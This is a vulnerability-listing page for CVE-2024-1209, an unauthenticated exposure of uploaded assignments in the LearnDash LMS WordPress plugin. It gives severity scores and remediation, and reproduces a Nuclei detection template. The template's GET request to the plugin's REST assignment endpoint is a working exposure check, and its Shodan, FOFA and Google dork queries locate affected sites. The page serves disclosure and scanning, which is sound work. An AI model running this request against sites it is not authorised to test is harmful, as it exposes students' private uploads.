Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-1209
HistoryFeb 20, 2024 - 6:32 p.m.

LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments

2024-02-2018:32:09
ProjectDiscovery
github.com
17
learndash
wordpress
vulnerability
exposure
cve-2024-1209
sensitive information
file access
unauthenticated

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

AI Score

5.5

Confidence

High

EPSS

0.016

Percentile

87.5%

The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.
id: CVE-2024-1209

info:
  name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments
  author: ritikchaddha
  severity: medium
  description: |
    The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.
  remediation: Fixed in 4.10.2
  reference:
    - https://wpscan.com/vulnerability/f813a21d-7a6a-4ff4-a43c-3e2991a23c7f/
    - https://github.com/karlemilnikka/CVE-2024-1209
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1209
    - https://www.learndash.com/release-notes/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-1209
    epss-score: 0.01199
    epss-percentile: 0.85131
    cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: learndash
    product: learndash
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/sfwd-lms
    fofa-query: body=/wp-content/plugins/sfwd-lms
    publicwww-query: "/wp-content/plugins/sfwd-lms"
    google-query: inurl:"/wp-content/plugins/sfwd-lms"
  tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"

    host-redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"id":'
          - 'slug":"assignment'
          - '.pdf"'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210088e37caea857081cdc0057cdd2571508327fa1fb7a077b2fb291421d2b3834b2022100d6040318aa37a2a7932b4cd6e6f83c853e77396dfa54c73d867ef92c039e72ca:922c64590222798bb761d5b6d8e72950

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

AI Score

5.5

Confidence

High

EPSS

0.016

Percentile

87.5%

Related for NUCLEI:CVE-2024-1209